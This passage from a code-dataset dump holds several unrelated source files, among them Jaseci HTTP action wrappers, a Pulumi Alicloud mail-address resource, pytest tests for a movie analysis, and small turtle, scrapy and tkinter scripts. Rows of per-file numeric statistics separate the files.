        entry_label = entry[1]
        if entry_label in classes:
            counts[entry_label] += 1
    return counts
if __name__ == "__main__":
    # run a round-robin minimax tournament across search depths 1..6
    depth_list = [1,2,3,4,5,6]
    score, elo_diff = minimax_tournament(depth_list,100)
| 42.928157
| 166
| 0.495275
| 5,974
| 59,155
| 4.623368
| 0.051724
| 0.027227
| 0.035301
| 0.034757
| 0.899819
| 0.885409
| 0.882259
| 0.873968
| 0.864518
| 0.863613
| 0
| 0.020516
| 0.426524
| 59,155
| 1,378
| 167
| 42.928157
| 0.793656
| 0.070543
| 0
| 0.860968
| 0
| 0
| 0.038302
| 0.00044
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013388
| false
| 0
| 0.014418
| 0
| 0.045314
| 0.032956
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be59a7815cdbbe5547e7f870f234461a7ff66030
| 2,534
|
py
|
Python
|
jaseci_core/jaseci/actions/standard/request.py
|
codedbychavez/jaseci
|
50393201d9e4590099a4865f95451897cb00f134
|
[
"MIT"
] | null | null | null |
jaseci_core/jaseci/actions/standard/request.py
|
codedbychavez/jaseci
|
50393201d9e4590099a4865f95451897cb00f134
|
[
"MIT"
] | null | null | null |
jaseci_core/jaseci/actions/standard/request.py
|
codedbychavez/jaseci
|
50393201d9e4590099a4865f95451897cb00f134
|
[
"MIT"
] | null | null | null |
"""Built in actions for Jaseci"""
import requests
from jaseci.actions.live_actions import jaseci_action
@jaseci_action()
def get(url: str, data: dict, header: dict):
    """
    Issue an HTTP GET request and wrap the result.

    Param 1 - url
    Param 2 - data (sent as the JSON body)
    Param 3 - header
    Return - dict with 'status_code' and decoded 'response'
    """
    response = requests.get(url, json=data, headers=header)
    try:
        body = response.json()
    except Exception:
        # not JSON: fall back to the raw text payload
        body = response.text
    return {'status_code': response.status_code, 'response': body}
@jaseci_action()
def post(url: str, data: dict, header: dict):
    """
    Issue a POST request.
    Param 1 - url
    Param 2 - data (sent as the JSON body)
    Param 3 - header
    Return - dict with 'status_code' and 'response' (parsed JSON if possible,
    otherwise the raw response text)
    """
    response = requests.post(url, json=data, headers=header)
    try:
        payload = response.json()
    except Exception:
        payload = response.text
    return {'status_code': response.status_code, 'response': payload}
@jaseci_action()
def put(url: str, data: dict, header: dict):
    """
    Issue a PUT request.
    Param 1 - url
    Param 2 - data (sent as the JSON body)
    Param 3 - header
    Return - dict with 'status_code' and 'response' (parsed JSON if possible,
    otherwise the raw response text)
    """
    response = requests.put(url, json=data, headers=header)
    try:
        payload = response.json()
    except Exception:
        payload = response.text
    return {'status_code': response.status_code, 'response': payload}
@jaseci_action()
def delete(url: str, data: dict, header: dict):
    """
    Issue a DELETE request.
    Param 1 - url
    Param 2 - data (sent as the JSON body)
    Param 3 - header
    Return - dict with 'status_code' and 'response' (parsed JSON if possible,
    otherwise the raw response text)
    """
    response = requests.delete(url, json=data, headers=header)
    try:
        payload = response.json()
    except Exception:
        payload = response.text
    return {'status_code': response.status_code, 'response': payload}
@jaseci_action()
def head(url: str, data: dict, header: dict):
    """
    Issue a HEAD request.
    Param 1 - url
    Param 2 - data (sent as the JSON body)
    Param 3 - header
    Return - dict with 'status_code' and 'response' (parsed JSON if possible,
    otherwise the raw response text; HEAD replies normally have an empty body)
    """
    response = requests.head(url, json=data, headers=header)
    try:
        payload = response.json()
    except Exception:
        payload = response.text
    return {'status_code': response.status_code, 'response': payload}
@jaseci_action()
def options(url: str, data: dict, header: dict):
    """
    Issue an OPTIONS request.
    Param 1 - url
    Param 2 - data (sent as the JSON body)
    Param 3 - header
    Return - dict with 'status_code' and 'response' (parsed JSON if possible,
    otherwise the raw response text)
    """
    response = requests.options(url, json=data, headers=header)
    try:
        payload = response.json()
    except Exception:
        payload = response.text
    return {'status_code': response.status_code, 'response': payload}
| 21.474576
| 58
| 0.59708
| 321
| 2,534
| 4.65109
| 0.127726
| 0.080375
| 0.112525
| 0.056263
| 0.898192
| 0.898192
| 0.898192
| 0.898192
| 0.898192
| 0.898192
| 0
| 0.00982
| 0.276638
| 2,534
| 117
| 59
| 21.65812
| 0.804692
| 0.214286
| 0
| 0.75
| 0
| 0
| 0.09005
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.107143
| false
| 0
| 0.035714
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
be6b0c34a40956e84ba6ab474ccc037dc5acfc41
| 489
|
py
|
Python
|
graphics 1_turtle.py
|
Suman196/Turtle-1
|
ef4fd1f98c3a3402909fa4c68d4fb21fc21ff30a
|
[
"MIT"
] | null | null | null |
graphics 1_turtle.py
|
Suman196/Turtle-1
|
ef4fd1f98c3a3402909fa4c68d4fb21fc21ff30a
|
[
"MIT"
] | null | null | null |
graphics 1_turtle.py
|
Suman196/Turtle-1
|
ef4fd1f98c3a3402909fa4c68d4fb21fc21ff30a
|
[
"MIT"
] | null | null | null |
import turtle

# Draws a 100x100 square, retraces one edge, then adds a series of
# 45/135-degree angled strokes. Command order matches the original drawing.
pen = turtle.Turtle()

# Square: three forward-and-turn sides, then the closing edge.
for _ in range(3):
    pen.forward(100)
    pen.left(90)
pen.forward(100)

# Retrace the last edge and turn to face the opposite direction.
pen.backward(100)
pen.right(180)

# Angled strokes: (turn direction, turn angle, stroke length) triples.
for turn, angle, dist in (
    (pen.right, 45, 50),
    (pen.right, 45, 100),
    (pen.right, 135, 50),
    (pen.left, 45, 100),
    (pen.left, 135, 50),
    (pen.left, 45, 100),
):
    turn(angle)
    pen.forward(dist)
| 21.26087
| 27
| 0.811861
| 90
| 489
| 4.166667
| 0.144444
| 0.469333
| 0.4
| 0.336
| 0.829333
| 0.829333
| 0.824
| 0.602667
| 0.602667
| 0.602667
| 0
| 0.114224
| 0.051125
| 489
| 23
| 28
| 21.26087
| 0.693966
| 0
| 0
| 0.73913
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.043478
| 0
| 0.043478
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
be7014e5fe081ff15a42629ae30c876c60f6b3fe
| 15,418
|
py
|
Python
|
sdk/python/pulumi_alicloud/directmail/mail_address.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 42
|
2019-03-18T06:34:37.000Z
|
2022-03-24T07:08:57.000Z
|
sdk/python/pulumi_alicloud/directmail/mail_address.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 152
|
2019-04-15T21:03:44.000Z
|
2022-03-29T18:00:57.000Z
|
sdk/python/pulumi_alicloud/directmail/mail_address.py
|
pulumi/pulumi-alicloud
|
9c34d84b4588a7c885c6bec1f03b5016e5a41683
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2020-08-26T17:30:07.000Z
|
2021-07-05T01:37:45.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['MailAddressArgs', 'MailAddress']
@pulumi.input_type
class MailAddressArgs:
    # NOTE(review): tfgen-generated input-argument bag for the MailAddress
    # resource — manual edits will be overwritten on regeneration. Values are
    # stored via pulumi.set/get, so they may be plain values or pulumi Outputs.
    def __init__(__self__, *,
                 account_name: pulumi.Input[str],
                 sendtype: pulumi.Input[str],
                 password: Optional[pulumi.Input[str]] = None,
                 reply_address: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a MailAddress resource.
        :param pulumi.Input[str] account_name: The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
        :param pulumi.Input[str] sendtype: Account type. Valid values: `batch`, `trigger`.
        :param pulumi.Input[str] password: Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
        :param pulumi.Input[str] reply_address: Return address.
        """
        # Required arguments are always recorded; optional ones only when
        # supplied, so unset values are never sent to the provider.
        pulumi.set(__self__, "account_name", account_name)
        pulumi.set(__self__, "sendtype", sendtype)
        if password is not None:
            pulumi.set(__self__, "password", password)
        if reply_address is not None:
            pulumi.set(__self__, "reply_address", reply_address)

    @property
    @pulumi.getter(name="accountName")
    def account_name(self) -> pulumi.Input[str]:
        """
        The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
        """
        return pulumi.get(self, "account_name")

    @account_name.setter
    def account_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "account_name", value)

    @property
    @pulumi.getter
    def sendtype(self) -> pulumi.Input[str]:
        """
        Account type. Valid values: `batch`, `trigger`.
        """
        return pulumi.get(self, "sendtype")

    @sendtype.setter
    def sendtype(self, value: pulumi.Input[str]):
        pulumi.set(self, "sendtype", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter(name="replyAddress")
    def reply_address(self) -> Optional[pulumi.Input[str]]:
        """
        Return address.
        """
        return pulumi.get(self, "reply_address")

    @reply_address.setter
    def reply_address(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "reply_address", value)
@pulumi.input_type
class _MailAddressState:
    # NOTE(review): tfgen-generated state bag used for MailAddress lookups —
    # every field is optional here because a lookup may filter on any subset.
    def __init__(__self__, *,
                 account_name: Optional[pulumi.Input[str]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 reply_address: Optional[pulumi.Input[str]] = None,
                 sendtype: Optional[pulumi.Input[str]] = None,
                 status: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering MailAddress resources.
        :param pulumi.Input[str] account_name: The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
        :param pulumi.Input[str] password: Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
        :param pulumi.Input[str] reply_address: Return address.
        :param pulumi.Input[str] sendtype: Account type. Valid values: `batch`, `trigger`.
        :param pulumi.Input[str] status: Account Status freeze: 1, normal: 0.
        """
        # Only record the fields the caller actually supplied.
        if account_name is not None:
            pulumi.set(__self__, "account_name", account_name)
        if password is not None:
            pulumi.set(__self__, "password", password)
        if reply_address is not None:
            pulumi.set(__self__, "reply_address", reply_address)
        if sendtype is not None:
            pulumi.set(__self__, "sendtype", sendtype)
        if status is not None:
            pulumi.set(__self__, "status", status)

    @property
    @pulumi.getter(name="accountName")
    def account_name(self) -> Optional[pulumi.Input[str]]:
        """
        The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
        """
        return pulumi.get(self, "account_name")

    @account_name.setter
    def account_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "account_name", value)

    @property
    @pulumi.getter
    def password(self) -> Optional[pulumi.Input[str]]:
        """
        Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
        """
        return pulumi.get(self, "password")

    @password.setter
    def password(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "password", value)

    @property
    @pulumi.getter(name="replyAddress")
    def reply_address(self) -> Optional[pulumi.Input[str]]:
        """
        Return address.
        """
        return pulumi.get(self, "reply_address")

    @reply_address.setter
    def reply_address(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "reply_address", value)

    @property
    @pulumi.getter
    def sendtype(self) -> Optional[pulumi.Input[str]]:
        """
        Account type. Valid values: `batch`, `trigger`.
        """
        return pulumi.get(self, "sendtype")

    @sendtype.setter
    def sendtype(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "sendtype", value)

    @property
    @pulumi.getter
    def status(self) -> Optional[pulumi.Input[str]]:
        """
        Account Status freeze: 1, normal: 0.
        """
        return pulumi.get(self, "status")

    @status.setter
    def status(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "status", value)
class MailAddress(pulumi.CustomResource):
    # NOTE(review): tfgen-generated resource class — manual edits will be
    # overwritten on regeneration.
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 account_name: Optional[pulumi.Input[str]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 reply_address: Optional[pulumi.Input[str]] = None,
                 sendtype: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        Provides a Direct Mail Mail Address resource.
        For information about Direct Mail Mail Address and how to use it, see [What is Mail Address](https://www.aliyun.com/product/directmail).
        > **NOTE:** Available in v1.134.0+.
        ## Example Usage
        Basic Usage
        ```python
        import pulumi
        import pulumi_alicloud as alicloud
        example = alicloud.directmail.MailAddress("example",
            account_name="example_value@email.com",
            sendtype="batch")
        ```
        > **Note:**
        A maximum of 10 mailing addresses can be added.
        Individual users: Up to 10 mailing addresses can be deleted within a month.
        Enterprise users: Up to 10 mailing addresses can be deleted within a month.
        ## Import
        Direct Mail Mail Address can be imported using the id, e.g.
        ```sh
        $ pulumi import alicloud:directmail/mailAddress:MailAddress example <id>
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] account_name: The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
        :param pulumi.Input[str] password: Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
        :param pulumi.Input[str] reply_address: Return address.
        :param pulumi.Input[str] sendtype: Account type. Valid values: `batch`, `trigger`.
        """
        ...

    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: MailAddressArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Provides a Direct Mail Mail Address resource.
        For information about Direct Mail Mail Address and how to use it, see [What is Mail Address](https://www.aliyun.com/product/directmail).
        > **NOTE:** Available in v1.134.0+.
        ## Example Usage
        Basic Usage
        ```python
        import pulumi
        import pulumi_alicloud as alicloud
        example = alicloud.directmail.MailAddress("example",
            account_name="example_value@email.com",
            sendtype="batch")
        ```
        > **Note:**
        A maximum of 10 mailing addresses can be added.
        Individual users: Up to 10 mailing addresses can be deleted within a month.
        Enterprise users: Up to 10 mailing addresses can be deleted within a month.
        ## Import
        Direct Mail Mail Address can be imported using the id, e.g.
        ```sh
        $ pulumi import alicloud:directmail/mailAddress:MailAddress example <id>
        ```
        :param str resource_name: The name of the resource.
        :param MailAddressArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...

    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads: an args-object call vs. a
        # keyword-argument call, resolved by the shared SDK helper.
        resource_args, opts = _utilities.get_resource_args_opts(MailAddressArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 account_name: Optional[pulumi.Input[str]] = None,
                 password: Optional[pulumi.Input[str]] = None,
                 reply_address: Optional[pulumi.Input[str]] = None,
                 sendtype: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        # Normalize resource options before registration.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = MailAddressArgs.__new__(MailAddressArgs)
            # Required-property checks are skipped when opts.urn is set
            # (the engine is rehydrating an existing resource by URN).
            if account_name is None and not opts.urn:
                raise TypeError("Missing required property 'account_name'")
            __props__.__dict__["account_name"] = account_name
            __props__.__dict__["password"] = password
            __props__.__dict__["reply_address"] = reply_address
            if sendtype is None and not opts.urn:
                raise TypeError("Missing required property 'sendtype'")
            __props__.__dict__["sendtype"] = sendtype
            # status is provider-computed output, never set by the caller.
            __props__.__dict__["status"] = None
        super(MailAddress, __self__).__init__(
            'alicloud:directmail/mailAddress:MailAddress',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            account_name: Optional[pulumi.Input[str]] = None,
            password: Optional[pulumi.Input[str]] = None,
            reply_address: Optional[pulumi.Input[str]] = None,
            sendtype: Optional[pulumi.Input[str]] = None,
            status: Optional[pulumi.Input[str]] = None) -> 'MailAddress':
        """
        Get an existing MailAddress resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] account_name: The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
        :param pulumi.Input[str] password: Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
        :param pulumi.Input[str] reply_address: Return address.
        :param pulumi.Input[str] sendtype: Account type. Valid values: `batch`, `trigger`.
        :param pulumi.Input[str] status: Account Status freeze: 1, normal: 0.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _MailAddressState.__new__(_MailAddressState)
        __props__.__dict__["account_name"] = account_name
        __props__.__dict__["password"] = password
        __props__.__dict__["reply_address"] = reply_address
        __props__.__dict__["sendtype"] = sendtype
        __props__.__dict__["status"] = status
        return MailAddress(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="accountName")
    def account_name(self) -> pulumi.Output[str]:
        """
        The sender address. The email address must be filled in the format of account@domain, and only lowercase letters or numbers can be used.
        """
        return pulumi.get(self, "account_name")

    @property
    @pulumi.getter
    def password(self) -> pulumi.Output[Optional[str]]:
        """
        Account password. The password must be length 10-20 string, contains numbers, uppercase letters, lowercase letters at the same time.
        """
        return pulumi.get(self, "password")

    @property
    @pulumi.getter(name="replyAddress")
    def reply_address(self) -> pulumi.Output[Optional[str]]:
        """
        Return address.
        """
        return pulumi.get(self, "reply_address")

    @property
    @pulumi.getter
    def sendtype(self) -> pulumi.Output[str]:
        """
        Account type. Valid values: `batch`, `trigger`.
        """
        return pulumi.get(self, "sendtype")

    @property
    @pulumi.getter
    def status(self) -> pulumi.Output[str]:
        """
        Account Status freeze: 1, normal: 0.
        """
        return pulumi.get(self, "status")
| 40.680739
| 183
| 0.638929
| 1,799
| 15,418
| 5.292385
| 0.108949
| 0.071631
| 0.088226
| 0.078563
| 0.822183
| 0.797185
| 0.775864
| 0.740258
| 0.734902
| 0.71232
| 0
| 0.005177
| 0.260799
| 15,418
| 378
| 184
| 40.78836
| 0.830218
| 0.371838
| 0
| 0.630208
| 1
| 0
| 0.090377
| 0.004938
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15625
| false
| 0.125
| 0.026042
| 0
| 0.276042
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
be95e8415cbcf5e535eb450da1c0b73734e38b6d
| 80
|
py
|
Python
|
DMRevenge/COMPONENT/__init__.py
|
u18-yuiha/DigestMaker
|
1a7478a81d9024ae22f647bc82adca780e885a26
|
[
"MIT",
"Unlicense"
] | null | null | null |
DMRevenge/COMPONENT/__init__.py
|
u18-yuiha/DigestMaker
|
1a7478a81d9024ae22f647bc82adca780e885a26
|
[
"MIT",
"Unlicense"
] | null | null | null |
DMRevenge/COMPONENT/__init__.py
|
u18-yuiha/DigestMaker
|
1a7478a81d9024ae22f647bc82adca780e885a26
|
[
"MIT",
"Unlicense"
] | null | null | null |
from tkinter import *
from tkinter import messagebox
#import BasicErrorComponent
| 26.666667
| 30
| 0.8625
| 9
| 80
| 7.666667
| 0.555556
| 0.318841
| 0.492754
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1125
| 80
| 3
| 31
| 26.666667
| 0.971831
| 0.325
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
beb197627874a5ffd86d853bb73e94b271c6d154
| 4,691
|
py
|
Python
|
test_movie_analysis.py
|
peyton-rh/project
|
2e1cbb133f551ef06a46d83848ee45bc7e40b2fd
|
[
"MIT"
] | null | null | null |
test_movie_analysis.py
|
peyton-rh/project
|
2e1cbb133f551ef06a46d83848ee45bc7e40b2fd
|
[
"MIT"
] | 2
|
2021-09-08T01:18:53.000Z
|
2022-01-13T01:40:56.000Z
|
test_movie_analysis.py
|
peyton-rh/project
|
2e1cbb133f551ef06a46d83848ee45bc7e40b2fd
|
[
"MIT"
] | 1
|
2019-09-30T13:21:41.000Z
|
2019-09-30T13:21:41.000Z
|
from analyze_movie import movie_analysis
import pytest
class TestMovieAnalysis:
    """Integration tests for movie_analysis.analyze_profitability across the
    raw-SQL, pandas, and dask output modes (backed by sqlite:///movies.db)."""

    def test_sql_actor_heading(self):
        """SQL mode with actors=True: first column header is the actor name."""
        result = movie_analysis.analyze_profitability(
            "sqlite:///movies.db", 'movie', actors=True, dataframe=False)
        assert result[0][0] == 'actor_1_name'

    def test_sql_genre_heading(self):
        """SQL mode without actors: first column header is the genres column."""
        result = movie_analysis.analyze_profitability(
            "sqlite:///movies.db", 'movie', dataframe=False)
        assert result[0][0] == 'genres'

    def test_sql_actor_results(self):
        """SQL mode with actors=True: first data row matches the known top actor."""
        result = movie_analysis.analyze_profitability(
            "sqlite:///movies.db", 'movie', actors=True, dataframe=False)
        assert result[1][0] == ('CCH Pounder', 237000000.0, 760505847.0, 523505847.0)

    def test_sql_genre_results(self):
        """SQL mode without actors: first data row matches the known top genre."""
        result = movie_analysis.analyze_profitability(
            "sqlite:///movies.db", 'movie', dataframe=False)
        assert result[1][0] == ('Action|Adventure|Fantasy|Sci-Fi', 237000000.0, 760505847.0, 523505847.0)

    def test_pandas_actor_results(self):
        """pandas mode (fit_in_memory=True) with actors: top row name and profit."""
        frame = movie_analysis.analyze_profitability(
            "sqlite:///movies.db", 'movie',
            actors=True, dataframe=True, fit_in_memory=True)
        assert frame.index[0] == 'Wayne Knight'
        assert frame.iloc[0, 2] == 293784000.0

    def test_pandas_genre_results(self):
        """pandas mode (fit_in_memory=True) without actors: top genre and profit."""
        frame = movie_analysis.analyze_profitability(
            "sqlite:///movies.db", 'movie',
            dataframe=True, fit_in_memory=True)
        assert frame.index[0] == 'Family|Sci-Fi'
        assert frame.iloc[0, 2] == 424449459.0

    def test_dask_actor_results(self):
        """dask mode (fit_in_memory=False) with actors: same results as pandas."""
        frame = movie_analysis.analyze_profitability(
            "sqlite:///movies.db", 'movie',
            actors=True, dataframe=True, fit_in_memory=False)
        assert frame.index[0] == 'Wayne Knight'
        assert frame.iloc[0, 2] == 293784000.0

    def test_dask_genre_results(self):
        """dask mode (fit_in_memory=False) without actors: same results as pandas."""
        frame = movie_analysis.analyze_profitability(
            "sqlite:///movies.db", 'movie',
            dataframe=True, fit_in_memory=False)
        assert frame.index[0] == 'Family|Sci-Fi'
        assert frame.iloc[0, 2] == 424449459.0

    def test_fit_in_memory_logic(self):
        """dask mode rejects an unknown index_col with a KeyError."""
        with pytest.raises(KeyError):
            movie_analysis.analyze_profitability(
                "sqlite:///movies.db", 'movie',
                dataframe=True, fit_in_memory=False, index_col='idx')
| 49.904255
| 100
| 0.452356
| 380
| 4,691
| 5.297368
| 0.165789
| 0.083458
| 0.089419
| 0.147541
| 0.839046
| 0.839046
| 0.839046
| 0.832588
| 0.828614
| 0.828614
| 0
| 0.049347
| 0.477297
| 4,691
| 93
| 101
| 50.44086
| 0.771615
| 0
| 0
| 0.768293
| 0
| 0
| 0.070134
| 0.006608
| 0
| 0
| 0
| 0
| 0.146341
| 1
| 0.109756
| false
| 0
| 0.02439
| 0
| 0.146341
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fea79ae4a40b117779eb70b3e839c7ede6d79b1b
| 187
|
py
|
Python
|
scrapy/gd/runner.py
|
xkdcc/robots
|
6c86bd56630fcfa003bc535b515a8a5e447d9274
|
[
"MIT"
] | null | null | null |
scrapy/gd/runner.py
|
xkdcc/robots
|
6c86bd56630fcfa003bc535b515a8a5e447d9274
|
[
"MIT"
] | null | null | null |
scrapy/gd/runner.py
|
xkdcc/robots
|
6c86bd56630fcfa003bc535b515a8a5e447d9274
|
[
"MIT"
] | 1
|
2021-01-28T16:51:52.000Z
|
2021-01-28T16:51:52.000Z
|
# -*- coding: utf-8 -*-
from scrapy import cmdline
# Launch the "safari" spider through Scrapy's CLI entry point (equivalent to
# running `scrapy runspider gd/spiders/safari.py` from the shell).
# Alternate spider invocation kept for reference:
# cmdline.execute("scrapy runspider gd/spiders/spider_gd.py".split())
cmdline.execute("scrapy runspider gd/spiders/safari.py".split())
| 31.166667
| 69
| 0.737968
| 26
| 187
| 5.269231
| 0.576923
| 0.20438
| 0.291971
| 0.423358
| 0.554745
| 0.554745
| 0
| 0
| 0
| 0
| 0
| 0.005882
| 0.090909
| 187
| 5
| 70
| 37.4
| 0.8
| 0.475936
| 0
| 0
| 0
| 0
| 0.389474
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
feacb480f072ddea612c4a6de9d331b78a832b7c
| 246
|
py
|
Python
|
source/__init__.py
|
li012589/NeuralWavelet
|
6e593ded5cb4ae80579cbf56eb9c346d808669cb
|
[
"Apache-2.0"
] | 28
|
2021-01-27T00:41:40.000Z
|
2022-02-14T10:11:51.000Z
|
source/__init__.py
|
li012589/NeuralWavelet
|
6e593ded5cb4ae80579cbf56eb9c346d808669cb
|
[
"Apache-2.0"
] | null | null | null |
source/__init__.py
|
li012589/NeuralWavelet
|
6e593ded5cb4ae80579cbf56eb9c346d808669cb
|
[
"Apache-2.0"
] | 6
|
2021-02-03T01:42:08.000Z
|
2021-12-03T17:47:19.000Z
|
from .gaussian import Gaussian
from .source import Source
from .discreteLogistic import DiscreteLogistic, MixtureDiscreteLogistic
from .hierarchyPrior import HierarchyPrior, ParameterizedHierarchyPrior, PassiveHierarchyPrior, SimpleHierarchyPrior
| 61.5
| 116
| 0.890244
| 20
| 246
| 10.95
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077236
| 246
| 4
| 116
| 61.5
| 0.964758
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
228e9a933d0cda0ee8f3e0cbb78a97ad0c3e4c6a
| 375
|
py
|
Python
|
rangeset/__init__.py
|
wenbobuaa/pykit
|
43e38fe40297a1e7a9329bcf3db3554c7ca48ead
|
[
"MIT"
] | 13
|
2016-12-16T09:23:09.000Z
|
2018-03-10T08:04:00.000Z
|
rangeset/__init__.py
|
wenbobuaa/pykit
|
43e38fe40297a1e7a9329bcf3db3554c7ca48ead
|
[
"MIT"
] | 74
|
